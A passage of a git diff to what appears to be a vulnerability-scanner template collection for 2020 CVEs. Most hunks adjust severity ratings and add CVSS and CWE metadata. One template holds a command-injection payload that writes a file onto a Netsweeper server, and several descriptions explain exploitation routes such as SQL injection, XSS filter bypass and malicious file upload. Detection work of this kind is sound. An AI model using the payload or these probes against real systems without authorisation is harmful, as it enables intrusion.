cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-10548.yaml b/cves/2020/CVE-2020-10548.yaml index d5d9e17baf..fb420c8e1b 100644 --- a/cves/2020/CVE-2020-10548.yaml +++ b/cves/2020/CVE-2020-10548.yaml @@ -2,12 +2,17 @@ id: CVE-2020-10548 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10548 + cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-10549.yaml b/cves/2020/CVE-2020-10549.yaml index 7447d9e4c9..9a05c1f547 100644 --- a/cves/2020/CVE-2020-10549.yaml +++ b/cves/2020/CVE-2020-10549.yaml @@ -2,12 +2,17 @@ id: CVE-2020-10549 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10549 + cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index c43c5b0539..46bc230027 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -3,13 +3,18 @@ id: CVE-2020-11034 info: name: GLPI v.9.4.6 - Open redirect author: pikpikcu - severity: low + severity: medium description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip - https://nvd.nist.gov/vuln/detail/CVE-2020-11034 tags: cve,cve2020,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-11034 + cwe-id: CWE-601 requests: diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index 09b3133b28..da0bf70b6c 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -9,6 +9,11 @@ info: reference: - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-11110 + cwe-id: CWE-79 requests: - raw: - | diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml index 88231d2864..99abf2cac1 100644 --- a/cves/2020/CVE-2020-11455.yaml +++ b/cves/2020/CVE-2020-11455.yaml @@ -3,12 +3,17 @@ id: CVE-2020-11455 info: name: LimeSurvey 4.1.11 - Path Traversal author: daffainfo - severity: high + severity: medium description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. reference: - https://www.exploit-db.com/exploits/48297 - https://www.cvedetails.com/cve/CVE-2020-11455 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-11455 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml index 80fa059eb9..c9b6f8c040 100644 --- a/cves/2020/CVE-2020-11547.yaml +++ b/cves/2020/CVE-2020-11547.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure - https://nvd.nist.gov/vuln/detail/CVE-2020-11547 tags: cve,cve2020,prtg,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-11547 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-11710.yaml b/cves/2020/CVE-2020-11710.yaml index f5550ad166..038ff53d98 100644 --- a/cves/2020/CVE-2020-11710.yaml +++ b/cves/2020/CVE-2020-11710.yaml @@ -3,10 +3,14 @@ id: CVE-2020-11710 info: name: Kong Admin Rest API Unauth author: pikpikcu - severity: info + severity: critical description: An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-11710 tags: cve,cve2020,kong + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-11710 requests: - method: GET diff --git a/cves/2020/CVE-2020-11738.yaml b/cves/2020/CVE-2020-11738.yaml index cfbb12b802..adec053def 100644 --- a/cves/2020/CVE-2020-11738.yaml +++ b/cves/2020/CVE-2020-11738.yaml @@ -13,6 +13,11 @@ info: reference: https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild tags: cve,cve2020,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-11738 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml index 8e2f1ce615..4d9ba909d4 100644 --- a/cves/2020/CVE-2020-11853.yaml +++ b/cves/2020/CVE-2020-11853.yaml @@ -14,6 +14,10 @@ info: Originated from Metasploit module (#14654). tags: cve,cve2020,opm,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-11853 requests: - method: GET diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml index 0f5f1bf477..710aa30a11 100644 --- a/cves/2020/CVE-2020-11854.yaml +++ b/cves/2020/CVE-2020-11854.yaml @@ -14,6 +14,11 @@ info: Originated from Metasploit module (#14654). tags: cve,cve2020,ucmdb,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-11854 + cwe-id: CWE-798 requests: - method: GET diff --git a/cves/2020/CVE-2020-11930.yaml b/cves/2020/CVE-2020-11930.yaml index 8561563078..9f8898694d 100644 --- a/cves/2020/CVE-2020-11930.yaml +++ b/cves/2020/CVE-2020-11930.yaml @@ -10,6 +10,11 @@ info: - https://wpscan.com/vulnerability/10181 - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module tags: cve,cve2020,wordpress,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-11930 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml index 1f966e8dc3..e5ec23bd48 100644 --- a/cves/2020/CVE-2020-11978.yaml +++ b/cves/2020/CVE-2020-11978.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - https://twitter.com/wugeej/status/1400336603604668418 tags: cve,cve2020,apache,airflow,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-11978 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index 043b9aeaa0..18b959d535 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml @@ -8,6 +8,11 @@ info: description: | When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-11991 + cwe-id: CWE-611 requests: - method: POST diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 60bcb223fb..0ee177bbaf 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -7,6 +7,11 @@ info: description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query). reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-12054 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index 32023cb990..696fd1ce4f 100644 --- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -7,6 +7,11 @@ info: description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. tags: cve,cve2020,zoho,lfi reference: https://github.com/BeetleChunks/CVE-2020-12116 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-12116 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml index 289db507b6..a187f2e53f 100644 --- a/cves/2020/CVE-2020-12720.yaml +++ b/cves/2020/CVE-2020-12720.yaml @@ -7,6 +7,11 @@ info: description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control. reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 tags: cve,cve2020,vbulletin,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-12720 + cwe-id: CWE-89,CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml index 8216d0e966..3f57c57e69 100644 --- a/cves/2020/CVE-2020-12800.yaml +++ b/cves/2020/CVE-2020-12800.yaml @@ -7,6 +7,11 @@ info: description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. reference: https://github.com/amartinsec/CVE-2020-12800 tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-12800 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index a1f55821f9..481f68259a 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -8,6 +8,11 @@ info: reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html tags: cve,cve2020,wavlink,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13117 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index 961d153f44..be49883637 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml @@ -11,6 +11,11 @@ info: - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says additional-fields: hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13167 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml index 93175bfeeb..943d37ec28 100644 --- a/cves/2020/CVE-2020-13483.yaml +++ b/cves/2020/CVE-2020-13483.yaml @@ -3,10 +3,15 @@ id: CVE-2020-13483 info: name: Bitrix24 through 20.0.0 allows XSS author: pikpikcu - severity: high + severity: medium reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. tags: cve,cve2020,xss,bitrix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13483 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml index 844a1401f5..13693b822a 100644 --- a/cves/2020/CVE-2020-13700.yaml +++ b/cves/2020/CVE-2020-13700.yaml @@ -10,6 +10,11 @@ info: It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. tags: cve,cve2020,wordpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 requests: - method: GET diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml index 4d8a08fa63..b9095c970e 100644 --- a/cves/2020/CVE-2020-13927.yaml +++ b/cves/2020/CVE-2020-13927.yaml @@ -5,6 +5,14 @@ info: author: pdteam severity: critical tags: cve,cve2020,apache,airflow,unauth + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13927 + description: "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default" + reference: + - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E + - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html requests: - method: GET diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index be27c3f3a9..28936101f5 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -15,6 +15,11 @@ info: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html tags: cve,cve2020,apache + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-13937 + cwe-id: CWE-922 requests: - method: GET diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml index 6f29058963..45757b968d 100644 --- a/cves/2020/CVE-2020-13942.yaml +++ b/cves/2020/CVE-2020-13942.yaml @@ -15,6 +15,11 @@ info: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://twitter.com/chybeta/status/1328912309440311297 tags: cve,cve2020,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13942 + cwe-id: CWE-74 requests: - method: POST diff --git a/cves/2020/CVE-2020-14092.yaml b/cves/2020/CVE-2020-14092.yaml index d23c7a5782..50f652bb22 100644 --- a/cves/2020/CVE-2020-14092.yaml +++ b/cves/2020/CVE-2020-14092.yaml @@ -7,6 +7,11 @@ info: description: WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. reference: https://wpscan.com/vulnerability/10287 tags: cve,cve2020,wordpress,wp-plugin,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14092 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-14179.yaml b/cves/2020/CVE-2020-14179.yaml index 116f824ef7..d586846e72 100644 --- a/cves/2020/CVE-2020-14179.yaml +++ b/cves/2020/CVE-2020-14179.yaml @@ -7,6 +7,10 @@ info: description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1. reference: https://jira.atlassian.com/browse/JRASERVER-71536 tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14179 requests: - method: GET diff --git a/cves/2020/CVE-2020-14181.yaml b/cves/2020/CVE-2020-14181.yaml index d50f1e806d..a71ed9dfb5 100644 --- a/cves/2020/CVE-2020-14181.yaml +++ b/cves/2020/CVE-2020-14181.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-71560 - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14181 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml index 5cbe2e48a3..e260ce4ca9 100644 --- a/cves/2020/CVE-2020-14413.yaml +++ b/cves/2020/CVE-2020-14413.yaml @@ -7,6 +7,11 @@ info: reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. tags: cve,cve2020,nedi,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-14413 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index 65f3b7b0f5..f46615666a 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -10,6 +10,10 @@ info: - https://www.oracle.com/security-alerts/cpuoct2020.html additional-fields: cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-14864 requests: - method: GET diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 8544701f97..50635623d5 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -18,6 +18,10 @@ info: attacker with network access via HTTP to compromise the server. Successful attacks of this vulnerability can result in takeover. tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14882 requests: - raw: diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 9deaa4c983..92e76199c0 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -3,10 +3,14 @@ id: CVE-2020-14883 info: name: Oracle WebLogic Server Administration Console Handle RCE author: pdteam - severity: critical + severity: high description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-14883 requests: - method: POST diff --git a/cves/2020/CVE-2020-15129.yaml b/cves/2020/CVE-2020-15129.yaml index a40edb0ae6..3b46eec92a 100644 --- a/cves/2020/CVE-2020-15129.yaml +++ b/cves/2020/CVE-2020-15129.yaml @@ -7,6 +7,11 @@ info: description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios. reference: https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik tags: cve,cve2020,traefik,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.70 + cve-id: CVE-2020-15129 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml index 247fac361d..1d65d8a045 100644 --- a/cves/2020/CVE-2020-15148.yaml +++ b/cves/2020/CVE-2020-15148.yaml @@ -3,11 +3,17 @@ id: CVE-2020-15148 info: name: Yii 2 (yiisoft/yii2) RCE author: pikpikcu - severity: high + severity: critical reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md tags: cve,cve2020,rce,yii + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-15148 + cwe-id: CWE-502 + description: "Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory." requests: - method: GET diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml index 474fa19f0a..e483393043 100644 --- a/cves/2020/CVE-2020-15227.yaml +++ b/cves/2020/CVE-2020-15227.yaml @@ -3,7 +3,7 @@ id: CVE-2020-15227 info: name: Nette Framework RCE author: becivells - severity: high + severity: critical description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 @@ -11,6 +11,11 @@ info: - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md tags: cve,cve2020,nette,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml index 910bd856be..b197b0e2de 100644 --- a/cves/2020/CVE-2020-15500.yaml +++ b/cves/2020/CVE-2020-15500.yaml @@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-15500 - https://github.com/maptiler/tileserver-gl/issues/461 tags: cve,cve2020,xss,tileserver + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-15500 + cwe-id: CWE-79 + description: "An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS." requests: - method: GET diff --git a/cves/2020/CVE-2020-15505.yaml b/cves/2020/CVE-2020-15505.yaml index 15ac2adc6c..1877acd2d4 100644 --- a/cves/2020/CVE-2020-15505.yaml +++ b/cves/2020/CVE-2020-15505.yaml @@ -16,6 +16,10 @@ info: - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - https://github.com/orangetw/JNDI-Injection-Bypass tags: cve,cve2020,mobileiron,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15505 requests: - raw: diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml index 4a4140cb1c..7ae06a5513 100644 --- a/cves/2020/CVE-2020-15568.yaml +++ b/cves/2020/CVE-2020-15568.yaml @@ -7,6 +7,11 @@ info: description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. reference: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ tags: cve,cve2020,terramaster,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15568 + cwe-id: CWE-913 requests: - raw: diff --git a/cves/2020/CVE-2020-15920.yaml b/cves/2020/CVE-2020-15920.yaml index e0457058b0..983229407e 100644 --- a/cves/2020/CVE-2020-15920.yaml +++ b/cves/2020/CVE-2020-15920.yaml @@ -7,6 +7,11 @@ info: description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required. reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html tags: cve,cve2020,mida,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15920 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml index 12f3ac20ab..d94b86da6f 100644 --- a/cves/2020/CVE-2020-16139.yaml +++ b/cves/2020/CVE-2020-16139.yaml @@ -3,11 +3,15 @@ id: CVE-2020-16139 info: name: Cisco 7937G Denial-of-Service Reboot Attack author: pikpikcu - severity: low + severity: high description: | A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. reference: https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ tags: cve,cve2020,dos,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-16139 requests: - raw: diff --git a/cves/2020/CVE-2020-16846.yaml 